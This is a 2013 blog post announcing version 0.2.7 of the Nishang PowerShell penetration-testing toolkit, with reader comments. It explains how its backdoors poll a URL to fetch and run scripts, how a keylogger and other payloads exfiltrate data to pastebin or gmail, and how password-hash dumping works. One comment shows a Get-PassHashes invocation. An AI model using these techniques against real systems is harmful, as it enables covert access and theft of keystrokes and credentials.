Monday, June 10, 2013

Nishang 0.2.7 - Improved backdoors, keylogger and better exfiltration

I like the backdoors in Nishang. Though very basic, they could be very useful depending on the situation and permission of usage (during a pen test). Two major things that have been improved in Nishang 0.2.7 for the backdoors (DNS_TXT_Pwnage, Time_Execution and Wait_For_Command) are:

1. These can now be stopped remotely and do not stop automatically after a single run.

This stopping remotely has been achieved by a simple logic. A payload asks for a URL (or DNS TXT record in case of DNS TXT Pwnage) where it will look for a particular string. As soon as the string is found there, the backdoor will stop itself. Below code snippet of Wait For Command shows this

What do we see here? The backdoor connects to $CheckURL every 5 seconds to look for a payload. If it matches $MagicString (lol!), a script is downloaded and executed. We will have a look at exfiltration in a moment. Ok, then the variable $exec is checked for. on sucess the payload waits for a minute before doing anything else. This is implemented to avoid generating too much traffic.

Still, since the backdoor connects every 5 seconds to a URL, it could be picked up fairly easily if someone monitors the egress traffic. Things are under constant improvement and in a future release the backdoors may connect in an irregular interval.

2. Exfiltration methods have been added and improved. Now the payloads can send data to pastebin, gmail or tinypaste. The backdoors can now return the result of command or script execution using one of the exfiltration methods. A new function Do-Exfiltration has been added to payloads which need to communicated to the Internet.

Lets see Wait For Command in action with exfiltration enabled.

While running this from a non-interactive* shell, use it like this:

 *non-interactive in terms of powershell. For example, due to standard output handling an interactive powershell is not possible from a meterprete or native shell from msf.

We used Get-WLAN-Keys from a Non-Elevated Shell, so the result is:


Nice! Make sure to return result from the payload which would be downloaded.

The biggest impact of this would be on the keylogger as it sends much data and pastebin allowed only limited pastes every day for a free account. Gmail is recommended for keylogger. If the Gmail account used for exfiltration has two factor authentication one can always use a application specific passoword. There has been another small but significant improvement in the keylogger. Now the keylogger will send only new keys after sending all keys 30 times. This reduces the size of data sent and removes redundant keys.

Persistence has been tested for most of the payloads and will be a part of a near future release.

 Below is the full CHANGELOG for this version:

- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.

You can get Nishang from its repository here. New users please check out and older users please update your repos.

I expect feedback, comments, bugs and feature requests. Hope this would be useful.


  1. i have problem in execution ; my account contain "&" in password ;it show that & is reserved for future ; & script execution stopped.

  2. Need more details. Which payload are you trying to execute? Which password contains a "&". If it is for pastebin/gmail etc. have you tried with an account whose password does not contain "&"?

  3. i tried information-gather & get-passhash payload ;they giving me following error.I tried gmail & pastebin.

    Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
    At line:1 char:73
    + .\Get-PassHashes.ps1 da6ecb1a05bca6be53541a758134b1e1 here_is_my_usernameof_pastebin NQADq& <<<< 5dj
    + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : AmpersandNotAllowed

    And yes payload work fine which doesn`t contain & in password.

    1. Ok the error you are getting is because powershell is interpreting the "&" in your password as a special character. I cannot address this issue immediately but will have a look at it in a future release. Would you mind raising an issue here, , that would help me in keeping track of this. Thanks.

  4. Thank you sir; i will raise issue there. And in feature requests you should add new module like miikatz ;which can get clear text password.I know with help of get-passhash we can get NTLM hash ;but it`s easy if we get clear text.

  5. you're actually a good webmaster. The site loading speed is amazing. It kind of feels that you're doing any unique trick. Moreover, The contents are masterpiece. you have performed a magnificent job on this subject! Check telephone answering service for best Telephone Service.